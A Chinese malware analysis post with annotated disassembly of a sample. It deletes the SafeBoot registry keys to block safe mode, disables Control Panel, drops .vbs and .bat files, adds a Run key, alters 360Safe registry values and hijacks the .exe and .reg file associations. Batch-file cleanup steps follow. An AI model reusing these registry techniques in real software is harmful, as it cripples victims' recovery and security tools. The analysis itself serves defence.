0x0 566 0040CA66 68 01000000 push 0x1 567 0040CA6B 68 04000080 push 0x80000004 568 0040CA70 6A 00 push 0x0 569 0040CA72 68 36994000 push 样本.00409936 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders" 570 0040CA77 68 01030080 push 0x80000301 571 0040CA7C 6A 00 push 0x0 572 0040CA7E 68 03000000 push 0x3 573 0040CA83 68 03000000 push 0x3 574 0040CA88 BB A4060000 mov ebx,0x6A4 575 0040CA8D E8 961A0000 call 样本.0040E528 ; 禁止修改控制面板
下面就是删除一些注册表项。来阻止我们进入安全模式:
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\”)
继续:
1 0040DFA4 83C4 10 add esp,0x10 2 0040DFA7 8945 EC mov dword ptr ss:[ebp-0x14],eax 3 0040DFAA 68 DABA4000 push 样本.0040BADA ; ASCII ".vbs" 4 0040DFAF FF75 EC push dword ptr ss:[ebp-0x14] 5 0040DFB2 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32\" 6 0040DFB7 FF75 FC push dword ptr ss:[ebp-0x4] 7 0040DFBA B9 04000000 mov ecx,0x4 8 0040DFBF E8 35E1FFFF call 样本.0040C0F9 ;生成一个43.vbs。。。位于("C:\WINDOWS\system32\43.vbs") 9 0040E08F 83C4 10 add esp,0x10 10 0040E092 8945 EC mov dword ptr ss:[ebp-0x14],eax 11 0040E095 68 EBBA4000 push 样本.0040BAEB ; ASCII ".bat" 12 0040E09A FF75 EC push dword ptr ss:[ebp-0x14] 13 0040E09D 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32\" 14 0040E0A2 FF75 FC push dword ptr ss:[ebp-0x4] 15 0040E0A5 B9 04000000 mov ecx,0x4 16 0040E0AA E8 4AE0FFFF call 样本.0040C0F9 ;生成一个24.bat。。。位于(ASCII "C:\WINDOWS\system32\24.bat") 17 0040E1B3 83C4 10 add esp,0x10 18 0040E1B6 8945 EC mov dword ptr ss:[ebp-0x14],eax 19 0040E1B9 68 EBBA4000 push 样本.0040BAEB ; ASCII ".bat" 20 0040E1BE FF75 EC push dword ptr ss:[ebp-0x14] 21 0040E1C1 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32\" 22 0040E1C6 FF75 FC push dword ptr ss:[ebp-0x4] 23 0040E1C9 B9 04000000 mov ecx,0x4 24 0040E1CE E8 26DFFFFF call 样本.0040C0F9 ;生成一个59.bat。。。(ASCII "C:\WINDOWS\system32\59.bat") 25 26 0040E29E 83C4 10 add esp,0x10 27 0040E2A1 8945 EC mov dword ptr ss:[ebp-0x14],eax 28 0040E2A4 68 DABA4000 push 样本.0040BADA ; ASCII ".vbs" 29 0040E2A9 FF75 EC push dword ptr ss:[ebp-0x14] 30 0040E2AC 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32\" 31 0040E2B1 FF75 FC push dword ptr ss:[ebp-0x4] 32 0040E2B4 B9 04000000 mov ecx,0x4 33 0040E2B9 E8 3BDEFFFF call 样本.0040C0F9 ;生成一个6.vbs。。。位于 (ASCII "C:\WINDOWS\system32\6.vbs") 34 0040E2F7 50 push eax 35 0040E2F8 68 04000080 push 0x80000004 36 0040E2FD 6A 00 push 0x0 37 0040E2FF 68 85BB4000 push 样本.0040BB85 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe" 38 0040E304 68 01030080 push 0x80000301 39 0040E309 6A 00 push 0x0 40 0040E30B 68 04000000 push 0x4 41 0040E310 68 03000000 push 0x3 42 0040E315 BB A4060000 mov ebx,0x6A4 43 0040E31A E8 09020000 call 样本.0040E528 44 0040E31F 83C4 28 add esp,0x28 45 0040E322 8B5D E8 mov ebx,dword ptr ss:[ebp-0x18] 46 0040E325 85DB test ebx,ebx 47 0040E327 74 09 je short 样本.0040E332 48 0040E329 53 push ebx 49 0040E32A E8 FF010000 call 样本.0040E52E 50 0040E32F 83C4 04 add esp,0x4 51 0040E332 68 01030080 push 0x80000301 52 0040E337 6A 00 push 0x0 53 0040E339 68 01000000 push 0x1 54 0040E33E 68 04000080 push 0x80000004 55 0040E343 6A 00 push 0x0 56 0040E345 68 92914000 push 样本.00409192 ; ASCII "SOFTWARE\360Safe\safemon\ExecAccess" 57 0040E34A 68 01030080 push 0x80000301 58 0040E34F 6A 00 push 0x0 59 0040E351 68 04000000 push 0x4 60 0040E356 68 03000000 push 0x3 61 0040E35B BB A4060000 mov ebx,0x6A4 62 0040E360 E8 C3010000 call 样本.0040E528 ; 将ExecAccess键值重新设置成1 63 0040E365 83C4 28 add esp,0x28 64 0040E368 68 01030080 push 0x80000301 65 0040E36D 6A 00 push 0x0 66 0040E36F 68 01000000 push 0x1 67 0040E374 68 04000080 push 0x80000004 68 0040E379 6A 00 push 0x0 69 0040E37B 68 B6914000 push 样本.004091B6 ; ASCII "SOFTWARE\360Safe\safemon\MonAccess" 70 0040E380 68 01030080 push 0x80000301 71 0040E385 6A 00 push 0x0 72 0040E387 68 04000000 push 0x4 73 0040E38C 68 03000000 push 0x3 74 0040E391 BB A4060000 mov ebx,0x6A4 75 0040E396 E8 8D010000 call 样本.0040E528 ; 将MonAccess键值设置成1 76 0040E39B 83C4 28 add esp,0x28 77 0040E39E 68 01030080 push 0x80000301 78 0040E3A3 6A 00 push 0x0 79 0040E3A5 68 01000000 push 0x1 80 0040E3AA 68 04000080 push 0x80000004 81 0040E3AF 6A 00 push 0x0 82 0040E3B1 68 D9914000 push 样本.004091D9 ; ASCII "SOFTWARE\360Safe\safemon\SiteAccess" 83 0040E3B6 68 01030080 push 0x80000301 84 0040E3BB 6A 00 push 0x0 85 0040E3BD 68 04000000 push 0x4 86 0040E3C2 68 03000000 push 0x3 87 0040E3C7 BB A4060000 mov ebx,0x6A4 88 0040E3CC E8 57010000 call 样本.0040E528 ; 将SiteAccess键值设置成1 89 0040E3D1 83C4 28 add esp,0x28 90 0040E3D4 68 01030080 push 0x80000301 91 0040E3D9 6A 00 push 0x0 92 0040E3DB 68 01000000 push 0x1 93 0040E3E0 68 04000080 push 0x80000004 94 0040E3E5 6A 00 push 0x0 95 0040E3E7 68 FD914000 push 样本.004091FD ; ASCII "SOFTWARE\360Safe\safemon\UDiskAccess" 96 0040E3EC 68 01030080 push 0x80000301 97 0040E3F1 6A 00 push 0x0 98 0040E3F3 68 04000000 push 0x4 99 0040E3F8 68 03000000 push 0x3 100 0040E3FD BB A4060000 mov ebx,0x6A4 101 0040E402 E8 21010000 call 样本.0040E528 ; 将UDiskAccess键值设置成1 102 103 104 105 0040E40A 68 04000080 push 0x80000004 106 0040E40F 6A 00 push 0x0 107 0040E411 68 3E924000 push 样本.0040923E ; ASCII "jpegfile" 108 0040E416 68 04000080 push 0x80000004 109 0040E41B 6A 00 push 0x0 110 0040E41D 68 BFBB4000 push 样本.0040BBBF ; ASCII ".reg\" 111 0040E422 68 01030080 push 0x80000301 112 0040E427 6A 00 push 0x0 113 0040E429 68 01000000 push 0x1 114 0040E42E 68 03000000 push 0x3 115 0040E433 BB A4060000 mov ebx,0x6A4 116 0040E438 E8 EB000000 call 样本.0040E528 117 118 修改.reg文件关联。 119 120 0040E440 68 04000080 push 0x80000004 121 0040E445 6A 00 push 0x0 122 0040E447 68 3E924000 push 样本.0040923E ; ASCII "jpegfile" 123 0040E44C 68 04000080 push 0x80000004 124 0040E451 6A 00 push 0x0 125 0040E453 68 C5BB4000 push 样本.0040BBC5 ; ASCII ".exe\" 126 0040E458 68 01030080 push 0x80000301 127 0040E45D 6A 00 push 0x0 128 0040E45F 68 01000000 push 0x1 129 0040E464 68 03000000 push 0x3 130 0040E469 BB A4060000 mov ebx,0x6A4 131 0040E46E E8 B5000000 call 样本.0040E528 132 133 修改.exe文件关联 134 135 0040E49D 6A 00 push 0x0 136 0040E49F 6A 00 push 0x0 137 0040E4A1 6A 00 push 0x0 138 0040E4A3 68 01030080 push 0x80000301 139 0040E4A8 6A 00 push 0x0 140 0040E4AA 68 14000000 push 0x14 141 0040E4AF 68 04000080 push 0x80000004 142 0040E4B4 6A 00 push 0x0 143 0040E4B6 68 DA904000 push 样本.004090DA 144 0040E4BB 68 03000000 push 0x3 145 0040E4C0 BB 00030000 mov ebx,0x300 146 0040E4C5 E8 5E000000 call 样本.0040E528 //弹出最开始的窗口 147 0040E4CA 83C4 28 add esp,0x28 148 0040E4CD 8BE5 mov esp,ebp 149 0040E4CF 5D pop ebp 150 0040E4D0 C3 retn //结束
代码就分析到这儿了。
解决方法:
中毒之后,一些inf,txt,exe,reg 都不能用。。。 这儿就想到了他没限制.bat和.vbs。 可能是因为他自己在运行的时候也需要运行.bat和.vbs的文件吧。。。 这儿就是突破口。
不能右键新建文件, 那就直接把一个文件的后缀修改成“.c”。直接就把病毒本体修改成“.c” 双击,可以打开,删除里面所有乱七八糟的东西,我们向里面输入:
@echo off
gpedit.msc
pause&exit
打开“组策略”,依次点:用户配置---管理模板---系统 在右边可以看到“阻止访问注册表编辑工具”打开之后,选中“已禁用”,然后保存退出。
设置成功之后,向.bat文件中输入
@echo off
regedit.exe
pause&exit
保存。打开,这样就可以打开注册表编辑器了。。。接下来就把他所修改了的注册表键值全部修改回去就可以了。。。
修改文件关联也用批处理:(以更改exe为例)
@echo off
assoc .exe=exefile
ftype exefile="%1"%*
pause&exit
处理完之后用杀软杀杀毒吧。
浙公网安备 33010602011771号